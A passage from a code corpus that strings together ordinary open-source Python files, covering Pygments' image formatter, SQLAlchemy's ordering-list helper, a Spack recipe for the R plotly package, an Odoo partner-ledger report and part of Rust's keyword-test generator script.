return self.fonts['BOLD']
elif oblique:
return self.fonts['ITALIC']
else:
return self.fonts['NORMAL']
class ImageFormatter(Formatter):
"""
Create a PNG image from source code. This uses the Python Imaging Library to
generate a pixmap from the source code.
*New in Pygments 0.10.*
Additional options accepted:
`image_format`
An image format to output to that is recognised by PIL, these include:
* "PNG" (default)
* "JPEG"
* "BMP"
* "GIF"
`line_pad`
The extra spacing (in pixels) between each line of text.
Default: 2
`font_name`
The font name to be used as the base font from which others, such as
bold and italic fonts will be generated. This really should be a
monospace font to look sane.
Default: "Bitstream Vera Sans Mono"
`font_size`
The font size in points to be used.
Default: 14
`image_pad`
The padding, in pixels to be used at each edge of the resulting image.
Default: 10
`line_numbers`
Whether line numbers should be shown: True/False
Default: True
`line_number_start`
The line number of the first line.
Default: 1
`line_number_step`
The step used when printing line numbers.
Default: 1
`line_number_bg`
The background colour (in "#123456" format) of the line number bar, or
None to use the style background color.
Default: "#eed"
`line_number_fg`
The text color of the line numbers (in "#123456"-like format).
Default: "#886"
`line_number_chars`
The number of columns of line numbers allowable in the line number
margin.
Default: 2
`line_number_bold`
Whether line numbers will be bold: True/False
Default: False
`line_number_italic`
Whether line numbers will be italicized: True/False
Default: False
`line_number_separator`
Whether a line will be drawn between the line number area and the
source code area: True/False
Default: True
`line_number_pad`
The horizontal padding (in pixels) between the line number margin, and
the source code area.
Default: 6
`hl_lines`
Specify a list of lines to be highlighted. *New in Pygments 1.2.*
Default: empty list
`hl_color`
Specify the color for highlighting lines. *New in Pygments 1.2.*
Default: highlight color of the selected style
"""
# Required by the pygments mapper
name = 'img'
aliases = ['img', 'IMG', 'png']
filenames = ['*.png']
unicodeoutput = False
default_image_format = 'png'
def __init__(self, **options):
"""
See the class docstring for explanation of options.
"""
if not pil_available:
raise PilNotAvailable(
'Python Imaging Library is required for this formatter')
Formatter.__init__(self, **options)
# Read the style
self.styles = dict(self.style)
if self.style.background_color is None:
self.background_color = '#fff'
else:
self.background_color = self.style.background_color
# Image options
self.image_format = get_choice_opt(
options, 'image_format', ['png', 'jpeg', 'gif', 'bmp'],
self.default_image_format, normcase=True)
self.image_pad = get_int_opt(options, 'image_pad', 10)
self.line_pad = get_int_opt(options, 'line_pad', 2)
# The fonts
fontsize = get_int_opt(options, 'font_size', 14)
self.fonts = FontManager(options.get('font_name', ''), fontsize)
self.fontw, self.fonth = self.fonts.get_char_size()
# Line number options
self.line_number_fg = options.get('line_number_fg', '#886')
self.line_number_bg = options.get('line_number_bg', '#eed')
self.line_number_chars = get_int_opt(options,
'line_number_chars', 2)
self.line_number_bold = get_bool_opt(options,
'line_number_bold', False)
self.line_number_italic = get_bool_opt(options,
'line_number_italic', False)
self.line_number_pad = get_int_opt(options, 'line_number_pad', 6)
self.line_numbers = get_bool_opt(options, 'line_numbers', True)
self.line_number_separator = get_bool_opt(options,
'line_number_separator', True)
self.line_number_step = get_int_opt(options, 'line_number_step', 1)
self.line_number_start = get_int_opt(options, 'line_number_start', 1)
if self.line_numbers:
self.line_number_width = (self.fontw * self.line_number_chars +
self.line_number_pad * 2)
else:
self.line_number_width = 0
self.hl_lines = []
hl_lines_str = get_list_opt(options, 'hl_lines', [])
for line in hl_lines_str:
try:
self.hl_lines.append(int(line))
except ValueError:
pass
self.hl_color = options.get('hl_color',
self.style.highlight_color) or '#f90'
self.drawables = []
def get_style_defs(self, arg=''):
raise NotImplementedError('The -S option is meaningless for the image '
'formatter. Use -O style=<stylename> instead.')
def _get_line_height(self):
"""
Get the height of a line.
"""
return self.fonth + self.line_pad
def _get_line_y(self, lineno):
"""
Get the Y coordinate of a line number.
"""
return lineno * self._get_line_height() + self.image_pad
def _get_char_width(self):
"""
Get the width of a character.
"""
return self.fontw
def _get_char_x(self, charno):
"""
Get the X coordinate of a character position.
"""
return charno * self.fontw + self.image_pad + self.line_number_width
def _get_text_pos(self, charno, lineno):
"""
Get the actual position for a character and line position.
"""
return self._get_char_x(charno), self._get_line_y(lineno)
def _get_linenumber_pos(self, lineno):
"""
Get the actual position for the start of a line number.
"""
return (self.image_pad, self._get_line_y(lineno))
def _get_text_color(self, style):
"""
Get the correct color for the token from the style.
"""
if style['color'] is not None:
fill = '#' + style['color']
else:
fill = '#000'
return fill
def _get_style_font(self, style):
"""
Get the correct font for the style.
"""
return self.fonts.get_font(style['bold'], style['italic'])
def _get_image_size(self, maxcharno, maxlineno):
"""
Get the required image size.
"""
return (self._get_char_x(maxcharno) + self.image_pad,
self._get_line_y(maxlineno + 0) + self.image_pad)
def _draw_linenumber(self, posno, lineno):
"""
Remember a line number drawable to paint later.
"""
self._draw_text(
self._get_linenumber_pos(posno),
str(lineno).rjust(self.line_number_chars),
font=self.fonts.get_font(self.line_number_bold,
self.line_number_italic),
fill=self.line_number_fg,
)
def _draw_text(self, pos, text, font, **kw):
"""
Remember a single drawable tuple to paint later.
"""
self.drawables.append((pos, text, font, kw))
def _create_drawables(self, tokensource):
"""
Create drawables for the token content.
"""
lineno = charno = maxcharno = 0
for ttype, value in tokensource:
while ttype not in self.styles:
ttype = ttype.parent
style = self.styles[ttype]
# TODO: make sure tab expansion happens earlier in the chain. It
# really ought to be done on the input, as to do it right here is
# quite complex.
value = value.expandtabs(4)
lines = value.splitlines(True)
#print lines
for i, line in enumerate(lines):
temp = line.rstrip('\n')
if temp:
self._draw_text(
self._get_text_pos(charno, lineno),
temp,
font = self._get_style_font(style),
fill = self._get_text_color(style)
)
charno += len(temp)
maxcharno = max(maxcharno, charno)
if line.endswith('\n'):
# add a line for each extra line in the value
charno = 0
lineno += 1
self.maxcharno = maxcharno
self.maxlineno = lineno
def _draw_line_numbers(self):
"""
Create drawables for the line numbers.
"""
if not self.line_numbers:
return
for p in range(self.maxlineno):
n = p + self.line_number_start
if (n % self.line_number_step) == 0:
self._draw_linenumber(p, n)
def _paint_line_number_bg(self, im):
"""
Paint the line number background on the image.
"""
if not self.line_numbers:
return
if self.line_number_fg is None:
return
draw = ImageDraw.Draw(im)
recth = im.size[-1]
rectw = self.image_pad + self.line_number_width - self.line_number_pad
draw.rectangle([(0, 0),
(rectw, recth)],
fill=self.line_number_bg)
draw.line([(rectw, 0), (rectw, recth)], fill=self.line_number_fg)
del draw
def format(self, tokensource, outfile):
"""
Format ``tokensource``, an iterable of ``(tokentype, tokenstring)``
tuples and write it into ``outfile``.
This implementation calculates where it should draw each token on the
pixmap, then calculates the required pixmap size and draws the items.
"""
self._create_drawables(tokensource)
self._draw_line_numbers()
im = Image.new(
'RGB',
self._get_image_size(self.maxcharno, self.maxlineno),
self.background_color
)
self._paint_line_number_bg(im)
draw = ImageDraw.Draw(im)
# Highlight
if self.hl_lines:
x = self.image_pad + self.line_number_width - self.line_number_pad + 1
recth = self._get_line_height()
rectw = im.size[0] - x
for linenumber in self.hl_lines:
y = self._get_line_y(linenumber - 1)
draw.rectangle([(x, y), (x + rectw, y + recth)],
fill=self.hl_color)
for pos, value, font, kw in self.drawables:
draw.text(pos, value, font=font, **kw)
im.save(outfile, self.image_format.upper())
# Add one formatter per format, so that the "-f gif" option gives the correct result
# when used in pygmentize.
class GifImageFormatter(ImageFormatter):
"""
Create a GIF image from source code. This uses the Python Imaging Library to
generate a pixmap from the source code.
*New in Pygments 1.0.* (You could create GIF images before by passing a
suitable `image_format` option to the `ImageFormatter`.)
"""
name = 'img_gif'
aliases = ['gif']
filenames = ['*.gif']
default_image_format = 'gif'
class JpgImageFormatter(ImageFormatter):
"""
Create a JPEG image from source code. This uses the Python Imaging Library to
generate a pixmap from the source code.
*New in Pygments 1.0.* (You could create JPEG images before by passing a
suitable `image_format` option to the `ImageFormatter`.)
"""
name = 'img_jpg'
aliases = ['jpg', 'jpeg']
filenames = ['*.jpg']
default_image_format = 'jpeg'
class BmpImageFormatter(ImageFormatter):
"""
Create a bitmap image from source code. This uses the Python Imaging Library to
generate a pixmap from the source code.
*New in Pygments 1.0.* (You could create bitmap images before by passing a
suitable `image_format` option to the `ImageFormatter`.)
"""
name = 'img_bmp'
aliases = ['bmp', 'bitmap']
filenames = ['*.bmp']
default_image_format = 'bmp'
| mit |
sqlalchemy/sqlalchemy | lib/sqlalchemy/ext/orderinglist.py | 3 | 13875 | # ext/orderinglist.py
# Copyright (C) 2005-2021 the SQLAlchemy authors and contributors
# <see AUTHORS file>
#
# This module is part of SQLAlchemy and is released under
# the MIT License: https://www.opensource.org/licenses/mit-license.php
"""A custom list that manages index/position information for contained
elements.
:author: Jason Kirtland
``orderinglist`` is a helper for mutable ordered relationships. It will
intercept list operations performed on a :func:`_orm.relationship`-managed
collection and
automatically synchronize changes in list position onto a target scalar
attribute.
Example: A ``slide`` table, where each row refers to zero or more entries
in a related ``bullet`` table. The bullets within a slide are
displayed in order based on the value of the ``position`` column in the
``bullet`` table. As entries are reordered in memory, the value of the
``position`` attribute should be updated to reflect the new sort order::
Base = declarative_base()
class Slide(Base):
__tablename__ = 'slide'
id = Column(Integer, primary_key=True)
name = Column(String)
bullets = relationship("Bullet", order_by="Bullet.position")
class Bullet(Base):
__tablename__ = 'bullet'
id = Column(Integer, primary_key=True)
slide_id = Column(Integer, ForeignKey('slide.id'))
position = Column(Integer)
text = Column(String)
The standard relationship mapping will produce a list-like attribute on each
``Slide`` containing all related ``Bullet`` objects,
but coping with changes in ordering is not handled automatically.
When appending a ``Bullet`` into ``Slide.bullets``, the ``Bullet.position``
attribute will remain unset until manually assigned. When the ``Bullet``
is inserted into the middle of the list, the following ``Bullet`` objects
will also need to be renumbered.
The :class:`.OrderingList` object automates this task, managing the
``position`` attribute on all ``Bullet`` objects in the collection. It is
constructed using the :func:`.ordering_list` factory::
from sqlalchemy.ext.orderinglist import ordering_list
Base = declarative_base()
class Slide(Base):
__tablename__ = 'slide'
id = Column(Integer, primary_key=True)
name = Column(String)
bullets = relationship("Bullet", order_by="Bullet.position",
collection_class=ordering_list('position'))
class Bullet(Base):
__tablename__ = 'bullet'
id = Column(Integer, primary_key=True)
slide_id = Column(Integer, ForeignKey('slide.id'))
position = Column(Integer)
text = Column(String)
With the above mapping the ``Bullet.position`` attribute is managed::
s = Slide()
s.bullets.append(Bullet())
s.bullets.append(Bullet())
s.bullets[1].position
>>> 1
s.bullets.insert(1, Bullet())
s.bullets[2].position
>>> 2
The :class:`.OrderingList` construct only works with **changes** to a
collection, and not the initial load from the database, and requires that the
list be sorted when loaded. Therefore, be sure to specify ``order_by`` on the
:func:`_orm.relationship` against the target ordering attribute, so that the
ordering is correct when first loaded.
.. warning::
:class:`.OrderingList` only provides limited functionality when a primary
key column or unique column is the target of the sort. Operations
that are unsupported or are problematic include:
* two entries must trade values. This is not supported directly in the
case of a primary key or unique constraint because it means at least
one row would need to be temporarily removed first, or changed to
a third, neutral value while the switch occurs.
* an entry must be deleted in order to make room for a new entry.
SQLAlchemy's unit of work performs all INSERTs before DELETEs within a
single flush. In the case of a primary key, it will trade
an INSERT/DELETE of the same primary key for an UPDATE statement in order
to lessen the impact of this limitation, however this does not take place
for a UNIQUE column.
A future feature will allow the "DELETE before INSERT" behavior to be
possible, alleviating this limitation, though this feature will require
explicit configuration at the mapper level for sets of columns that
are to be handled in this way.
:func:`.ordering_list` takes the name of the related object's ordering
attribute as an argument. By default, the zero-based integer index of the
object's position in the :func:`.ordering_list` is synchronized with the
ordering attribute: index 0 will get position 0, index 1 position 1, etc. To
start numbering at 1 or some other integer, provide ``count_from=1``.
"""
from ..orm.collections import collection
from ..orm.collections import collection_adapter
__all__ = ["ordering_list"]
def ordering_list(attr, count_from=None, **kw):
"""Prepares an :class:`OrderingList` factory for use in mapper definitions.
Returns an object suitable for use as an argument to a Mapper
relationship's ``collection_class`` option. e.g.::
from sqlalchemy.ext.orderinglist import ordering_list
class Slide(Base):
__tablename__ = 'slide'
id = Column(Integer, primary_key=True)
name = Column(String)
bullets = relationship("Bullet", order_by="Bullet.position",
collection_class=ordering_list('position'))
:param attr:
Name of the mapped attribute to use for storage and retrieval of
ordering information
:param count_from:
Set up an integer-based ordering, starting at ``count_from``. For
example, ``ordering_list('pos', count_from=1)`` would create a 1-based
list in SQL, storing the value in the 'pos' column. Ignored if
``ordering_func`` is supplied.
Additional arguments are passed to the :class:`.OrderingList` constructor.
"""
kw = _unsugar_count_from(count_from=count_from, **kw)
return lambda: OrderingList(attr, **kw)
# Ordering utility functions
def count_from_0(index, collection):
"""Numbering function: consecutive integers starting at 0."""
return index
def count_from_1(index, collection):
"""Numbering function: consecutive integers starting at 1."""
return index + 1
def count_from_n_factory(start):
"""Numbering function: consecutive integers starting at arbitrary start."""
def f(index, collection):
return index + start
try:
f.__name__ = "count_from_%i" % start
except TypeError:
pass
return f
def _unsugar_count_from(**kw):
"""Builds counting functions from keyword arguments.
Keyword argument filter, prepares a simple ``ordering_func`` from a
``count_from`` argument, otherwise passes ``ordering_func`` on unchanged.
"""
count_from = kw.pop("count_from", None)
if kw.get("ordering_func", None) is None and count_from is not None:
if count_from == 0:
kw["ordering_func"] = count_from_0
elif count_from == 1:
kw["ordering_func"] = count_from_1
else:
kw["ordering_func"] = count_from_n_factory(count_from)
return kw
class OrderingList(list):
"""A custom list that manages position information for its children.
The :class:`.OrderingList` object is normally set up using the
:func:`.ordering_list` factory function, used in conjunction with
the :func:`_orm.relationship` function.
"""
def __init__(
self, ordering_attr=None, ordering_func=None, reorder_on_append=False
):
"""A custom list that manages position information for its children.
``OrderingList`` is a ``collection_class`` list implementation that
syncs position in a Python list with a position attribute on the
mapped objects.
This implementation relies on the list starting in the proper order,
so be **sure** to put an ``order_by`` on your relationship.
:param ordering_attr:
Name of the attribute that stores the object's order in the
relationship.
:param ordering_func: Optional. A function that maps the position in
the Python list to a value to store in the
``ordering_attr``. Values returned are usually (but need not be!)
integers.
An ``ordering_func`` is called with two positional parameters: the
index of the element in the list, and the list itself.
If omitted, Python list indexes are used for the attribute values.
Two basic pre-built numbering functions are provided in this module:
``count_from_0`` and ``count_from_1``. For more exotic examples
like stepped numbering, alphabetical and Fibonacci numbering, see
the unit tests.
:param reorder_on_append:
Default False. When appending an object with an existing (non-None)
ordering value, that value will be left untouched unless
``reorder_on_append`` is true. This is an optimization to avoid a
variety of dangerous unexpected database writes.
SQLAlchemy will add instances to the list via append() when your
object loads. If for some reason the result set from the database
skips a step in the ordering (say, row '1' is missing but you get
'2', '3', and '4'), reorder_on_append=True would immediately
renumber the items to '1', '2', '3'. If you have multiple sessions
making changes, any of whom happen to load this collection even in
passing, all of the sessions would try to "clean up" the numbering
in their commits, possibly causing all but one to fail with a
concurrent modification error.
Recommend leaving this with the default of False, and just call
``reorder()`` if you're doing ``append()`` operations with
previously ordered instances or when doing some housekeeping after
manual sql operations.
"""
self.ordering_attr = ordering_attr
if ordering_func is None:
ordering_func = count_from_0
self.ordering_func = ordering_func
self.reorder_on_append = reorder_on_append
# More complex serialization schemes (multi column, e.g.) are possible by
# subclassing and reimplementing these two methods.
def _get_order_value(self, entity):
return getattr(entity, self.ordering_attr)
def _set_order_value(self, entity, value):
setattr(entity, self.ordering_attr, value)
def reorder(self):
"""Synchronize ordering for the entire collection.
Sweeps through the list and ensures that each object has accurate
ordering information set.
"""
for index, entity in enumerate(self):
self._order_entity(index, entity, True)
# As of 0.5, _reorder is no longer semi-private
_reorder = reorder
def _order_entity(self, index, entity, reorder=True):
have = self._get_order_value(entity)
# Don't disturb existing ordering if reorder is False
if have is not None and not reorder:
return
should_be = self.ordering_func(index, self)
if have != should_be:
self._set_order_value(entity, should_be)
def append(self, entity):
super(OrderingList, self).append(entity)
self._order_entity(len(self) - 1, entity, self.reorder_on_append)
def _raw_append(self, entity):
"""Append without any ordering behavior."""
super(OrderingList, self).append(entity)
_raw_append = collection.adds(1)(_raw_append)
def insert(self, index, entity):
super(OrderingList, self).insert(index, entity)
self._reorder()
def remove(self, entity):
super(OrderingList, self).remove(entity)
adapter = collection_adapter(self)
if adapter and adapter._referenced_by_owner:
self._reorder()
def pop(self, index=-1):
entity = super(OrderingList, self).pop(index)
self._reorder()
return entity
def __setitem__(self, index, entity):
if isinstance(index, slice):
step = index.step or 1
start = index.start or 0
if start < 0:
start += len(self)
stop = index.stop or len(self)
if stop < 0:
stop += len(self)
for i in range(start, stop, step):
self.__setitem__(i, entity[i])
else:
self._order_entity(index, entity, True)
super(OrderingList, self).__setitem__(index, entity)
def __delitem__(self, index):
super(OrderingList, self).__delitem__(index)
self._reorder()
def __setslice__(self, start, end, values):
super(OrderingList, self).__setslice__(start, end, values)
self._reorder()
def __delslice__(self, start, end):
super(OrderingList, self).__delslice__(start, end)
self._reorder()
def __reduce__(self):
return _reconstitute, (self.__class__, self.__dict__, list(self))
for func_name, func in list(locals().items()):
if (
callable(func)
and func.__name__ == func_name
and not func.__doc__
and hasattr(list, func_name)
):
func.__doc__ = getattr(list, func_name).__doc__
del func_name, func
def _reconstitute(cls, dict_, items):
"""Reconstitute an :class:`.OrderingList`.
This is the adjoint to :meth:`.OrderingList.__reduce__`. It is used for
unpickling :class:`.OrderingList` objects.
"""
obj = cls.__new__(cls)
obj.__dict__.update(dict_)
list.extend(obj, items)
return obj
| mit |
mfherbst/spack | var/spack/repos/builtin/packages/r-plotly/package.py | 5 | 2533 | ##############################################################################
# Copyright (c) 2013-2018, Lawrence Livermore National Security, LLC.
# Produced at the Lawrence Livermore National Laboratory.
#
# This file is part of Spack.
# Created by Todd Gamblin, [email protected], All rights reserved.
# LLNL-CODE-647188
#
# For details, see https://github.com/spack/spack
# Please also see the NOTICE and LICENSE files for our notice and the LGPL.
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU Lesser General Public License (as
# published by the Free Software Foundation) version 2.1, February 1999.
#
# This program is distributed in the hope that it will be useful, but
# WITHOUT ANY WARRANTY; without even the IMPLIED WARRANTY OF
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the terms and
# conditions of the GNU Lesser General Public License for more details.
#
# You should have received a copy of the GNU Lesser General Public
# License along with this program; if not, write to the Free Software
# Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 USA
##############################################################################
from spack import *
class RPlotly(RPackage):
"""Easily translate 'ggplot2' graphs to an interactive web-based version
and/or create custom web-based visualizations directly from R."""
homepage = "https://cran.r-project.org/web/packages/plotly/index.html"
url = "https://cran.r-project.org/src/contrib/plotly_4.7.1.tar.gz"
list_url = "https://cran.rstudio.com/src/contrib/Archive/plotly"
version('4.7.1', '4799c8b429291d4c52fb904380806548')
version('4.7.0', '5bd52d515c01af7ff291c30a6cf23bec')
version('4.6.0', '27ff3de288bacfaad6e6694752ea2929')
version('4.5.6', 'e6e00177fa64dc6b1a199facfd73f585')
version('4.5.2', '7eb11b24a9faa9a572657fd89ed72fa5')
depends_on('[email protected]:3.4.9')
depends_on('r-ggplot2', type=('build', 'run'))
depends_on('r-httr', type=('build', 'run'))
depends_on('r-base64enc', type=('build', 'run'))
depends_on('r-htmltools', type=('build', 'run'))
depends_on('r-tidyr', type=('build', 'run'))
depends_on('r-dplyr', type=('build', 'run'))
depends_on('r-htmlwidgets', type=('build', 'run'))
depends_on('r-data-table', type=('build', 'run'))
depends_on('r-hexbin', type=('build', 'run'))
depends_on('r-purrr', type=('build', 'run'))
depends_on('r-crosstalk', type=('build', 'run'))
| lgpl-2.1 |
dllsf/odootest | addons/account/report/account_partner_ledger.py | 81 | 13063 | # -*- coding: utf-8 -*-
##############################################################################
#
# OpenERP, Open Source Management Solution
# Copyright (C) 2004-2010 Tiny SPRL (<http://tiny.be>).
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
##############################################################################
import time
from openerp.osv import osv
from openerp.tools.translate import _
from openerp.report import report_sxw
from common_report_header import common_report_header
class third_party_ledger(report_sxw.rml_parse, common_report_header):
def __init__(self, cr, uid, name, context=None):
super(third_party_ledger, self).__init__(cr, uid, name, context=context)
self.init_bal_sum = 0.0
self.localcontext.update({
'time': time,
'lines': self.lines,
'sum_debit_partner': self._sum_debit_partner,
'sum_credit_partner': self._sum_credit_partner,
'get_currency': self._get_currency,
'get_start_period': self.get_start_period,
'get_end_period': self.get_end_period,
'get_account': self._get_account,
'get_filter': self._get_filter,
'get_start_date': self._get_start_date,
'get_end_date': self._get_end_date,
'get_fiscalyear': self._get_fiscalyear,
'get_journal': self._get_journal,
'get_partners':self._get_partners,
'get_intial_balance':self._get_intial_balance,
'display_initial_balance':self._display_initial_balance,
'display_currency':self._display_currency,
'get_target_move': self._get_target_move,
})
def _get_filter(self, data):
if data['form']['filter'] == 'unreconciled':
return _('Unreconciled Entries')
return super(third_party_ledger, self)._get_filter(data)
def set_context(self, objects, data, ids, report_type=None):
obj_move = self.pool.get('account.move.line')
obj_partner = self.pool.get('res.partner')
self.query = obj_move._query_get(self.cr, self.uid, obj='l', context=data['form'].get('used_context', {}))
ctx2 = data['form'].get('used_context',{}).copy()
self.initial_balance = data['form'].get('initial_balance', True)
if self.initial_balance:
ctx2.update({'initial_bal': True})
self.init_query = obj_move._query_get(self.cr, self.uid, obj='l', context=ctx2)
self.reconcil = True
if data['form']['filter'] == 'unreconciled':
self.reconcil = False
self.result_selection = data['form'].get('result_selection', 'customer')
self.amount_currency = data['form'].get('amount_currency', False)
self.target_move = data['form'].get('target_move', 'all')
PARTNER_REQUEST = ''
move_state = ['draft','posted']
if self.target_move == 'posted':
move_state = ['posted']
if self.result_selection == 'supplier':
self.ACCOUNT_TYPE = ['payable']
elif self.result_selection == 'customer':
self.ACCOUNT_TYPE = ['receivable']
else:
self.ACCOUNT_TYPE = ['payable','receivable']
self.cr.execute(
"SELECT a.id " \
"FROM account_account a " \
"LEFT JOIN account_account_type t " \
"ON (a.type=t.code) " \
'WHERE a.type IN %s' \
"AND a.active", (tuple(self.ACCOUNT_TYPE), ))
self.account_ids = [a for (a,) in self.cr.fetchall()]
params = [tuple(move_state), tuple(self.account_ids)]
#if we print from the partners, add a clause on active_ids
if (data['model'] == 'res.partner') and ids:
PARTNER_REQUEST = "AND l.partner_id IN %s"
params += [tuple(ids)]
self.cr.execute(
"SELECT DISTINCT l.partner_id " \
"FROM account_move_line AS l, account_account AS account, " \
" account_move AS am " \
"WHERE l.partner_id IS NOT NULL " \
"AND l.account_id = account.id " \
"AND am.id = l.move_id " \
"AND am.state IN %s"
# "AND " + self.query +" " \
"AND l.account_id IN %s " \
" " + PARTNER_REQUEST + " " \
"AND account.active ", params)
self.partner_ids = [res['partner_id'] for res in self.cr.dictfetchall()]
objects = obj_partner.browse(self.cr, self.uid, self.partner_ids)
return super(third_party_ledger, self).set_context(objects, data, self.partner_ids, report_type)
def lines(self, partner):
move_state = ['draft','posted']
if self.target_move == 'posted':
move_state = ['posted']
full_account = []
if self.reconcil:
RECONCILE_TAG = " "
else:
RECONCILE_TAG = "AND l.reconcile_id IS NULL"
self.cr.execute(
"SELECT l.id, l.date, j.code, acc.code as a_code, acc.name as a_name, l.ref, m.name as move_name, l.name, l.debit, l.credit, l.amount_currency,l.currency_id, c.symbol AS currency_code " \
"FROM account_move_line l " \
"LEFT JOIN account_journal j " \
"ON (l.journal_id = j.id) " \
"LEFT JOIN account_account acc " \
"ON (l.account_id = acc.id) " \
"LEFT JOIN res_currency c ON (l.currency_id=c.id)" \
"LEFT JOIN account_move m ON (m.id=l.move_id)" \
"WHERE l.partner_id = %s " \
"AND l.account_id IN %s AND " + self.query +" " \
"AND m.state IN %s " \
" " + RECONCILE_TAG + " "\
"ORDER BY l.date",
(partner.id, tuple(self.account_ids), tuple(move_state)))
res = self.cr.dictfetchall()
sum = 0.0
if self.initial_balance:
sum = self.init_bal_sum
for r in res:
sum += r['debit'] - r['credit']
r['progress'] = sum
full_account.append(r)
return full_account
def _get_intial_balance(self, partner):
move_state = ['draft','posted']
if self.target_move == 'posted':
move_state = ['posted']
if self.reconcil:
RECONCILE_TAG = " "
else:
RECONCILE_TAG = "AND l.reconcile_id IS NULL"
self.cr.execute(
"SELECT COALESCE(SUM(l.debit),0.0), COALESCE(SUM(l.credit),0.0), COALESCE(sum(debit-credit), 0.0) " \
"FROM account_move_line AS l, " \
"account_move AS m "
"WHERE l.partner_id = %s " \
"AND m.id = l.move_id " \
"AND m.state IN %s "
"AND account_id IN %s" \
" " + RECONCILE_TAG + " "\
"AND " + self.init_query + " ",
(partner.id, tuple(move_state), tuple(self.account_ids)))
res = self.cr.fetchall()
self.init_bal_sum = res[0][2]
return res
def _sum_debit_partner(self, partner):
move_state = ['draft','posted']
if self.target_move == 'posted':
move_state = ['posted']
result_tmp = 0.0
result_init = 0.0
if self.reconcil:
RECONCILE_TAG = " "
else:
RECONCILE_TAG = "AND reconcile_id IS NULL"
if self.initial_balance:
self.cr.execute(
"SELECT sum(debit) " \
"FROM account_move_line AS l, " \
"account_move AS m "
"WHERE l.partner_id = %s" \
"AND m.id = l.move_id " \
"AND m.state IN %s "
"AND account_id IN %s" \
" " + RECONCILE_TAG + " " \
"AND " + self.init_query + " ",
(partner.id, tuple(move_state), tuple(self.account_ids)))
contemp = self.cr.fetchone()
if contemp != None:
result_init = contemp[0] or 0.0
else:
result_init = result_tmp + 0.0
self.cr.execute(
"SELECT sum(debit) " \
"FROM account_move_line AS l, " \
"account_move AS m "
"WHERE l.partner_id = %s " \
"AND m.id = l.move_id " \
"AND m.state IN %s "
"AND account_id IN %s" \
" " + RECONCILE_TAG + " " \
"AND " + self.query + " ",
(partner.id, tuple(move_state), tuple(self.account_ids),))
contemp = self.cr.fetchone()
if contemp != None:
result_tmp = contemp[0] or 0.0
else:
result_tmp = result_tmp + 0.0
return result_tmp + result_init
def _sum_credit_partner(self, partner):
move_state = ['draft','posted']
if self.target_move == 'posted':
move_state = ['posted']
result_tmp = 0.0
result_init = 0.0
if self.reconcil:
RECONCILE_TAG = " "
else:
RECONCILE_TAG = "AND reconcile_id IS NULL"
if self.initial_balance:
self.cr.execute(
"SELECT sum(credit) " \
"FROM account_move_line AS l, " \
"account_move AS m "
"WHERE l.partner_id = %s" \
"AND m.id = l.move_id " \
"AND m.state IN %s "
"AND account_id IN %s" \
" " + RECONCILE_TAG + " " \
"AND " + self.init_query + " ",
(partner.id, tuple(move_state), tuple(self.account_ids)))
contemp = self.cr.fetchone()
if contemp != None:
result_init = contemp[0] or 0.0
else:
result_init = result_tmp + 0.0
self.cr.execute(
"SELECT sum(credit) " \
"FROM account_move_line AS l, " \
"account_move AS m "
"WHERE l.partner_id=%s " \
"AND m.id = l.move_id " \
"AND m.state IN %s "
"AND account_id IN %s" \
" " + RECONCILE_TAG + " " \
"AND " + self.query + " ",
(partner.id, tuple(move_state), tuple(self.account_ids),))
contemp = self.cr.fetchone()
if contemp != None:
result_tmp = contemp[0] or 0.0
else:
result_tmp = result_tmp + 0.0
return result_tmp + result_init
def _get_partners(self):
# TODO: deprecated, to remove in trunk
if self.result_selection == 'customer':
return _('Receivable Accounts')
elif self.result_selection == 'supplier':
return _('Payable Accounts')
elif self.result_selection == 'customer_supplier':
return _('Receivable and Payable Accounts')
return ''
def _sum_currency_amount_account(self, account, form):
self._set_get_account_currency_code(account.id)
self.cr.execute("SELECT sum(aml.amount_currency) FROM account_move_line as aml,res_currency as rc WHERE aml.currency_id = rc.id AND aml.account_id= %s ", (account.id,))
total = self.cr.fetchone()
if self.account_currency:
return_field = str(total[0]) + self.account_currency
return return_field
else:
currency_total = self.tot_currency = 0.0
return currency_total
def _display_initial_balance(self, data):
if self.initial_balance:
return True
return False
def _display_currency(self, data):
if self.amount_currency:
return True
return False
class report_partnerledger(osv.AbstractModel):
_name = 'report.account.report_partnerledger'
_inherit = 'report.abstract_report'
_template = 'account.report_partnerledger'
_wrapped_report_class = third_party_ledger
class report_partnerledgerother(osv.AbstractModel):
_name = 'report.account.report_partnerledgerother'
_inherit = 'report.abstract_report'
_template = 'account.report_partnerledgerother'
_wrapped_report_class = third_party_ledger
# vim:expandtab:smartindent:tabstop=4:softtabstop=4:shiftwidth=4:
| agpl-3.0 |
avdi/rust | src/etc/generate-keyword-tests.py | 53 | 1985 | #!/usr/bin/env python
#
# Copyright 2013 The Rust Project Developers. See the COPYRIGHT
# file at the top-level directory of this distribution and at
# http://rust-lang.org/COPYRIGHT.
#
# Licensed under the Apache License, Version 2.0 <LICENSE-APACHE or
# http://www.apache.org/licenses/LICENSE-2.0> or the MIT license
# <LICENSE-MIT or http://opensource.org/licenses/MIT>, at your
# option. This file may not be copied, modified, or distributed
# except according to those terms.
"""
This script takes a list of keywords and generates a testcase, that checks
if using the keyword as identifier fails, for every keyword. The generate
test files are set read-only.
Test for https://github.com/rust-lang/rust/issues/2275
sample usage: src/etc/generate-keyword-tests.py as break
"""
import sys
import os
import datetime
import stat
template = """// Copyright %d The Rust Project Developers. See the COPYRIGHT
// file at the top-level directory of this distribution and at
// http://rust-lang.org/COPYRIGHT.
//
// Licensed under the Apache License, Version 2.0 <LICENSE-APACHE or
// http://www.apache.org/licenses/LICENSE-2.0> or the MIT license
// <LICENSE-MIT or http://opensource.org/licenses/MIT>, at your
// option. This file may not be copied, modified, or distributed
// except according to those terms.
// This file was auto-generated using 'src/etc/generate-keyword-tests.py %s'
fn main() {
let %s = "foo"; //~ error: ident
}
"""
test_dir = os.path.abspath(
os.path.join(os.path.dirname(__file__), '../test/compile-fail')
)
for kw in sys.argv[1:]:
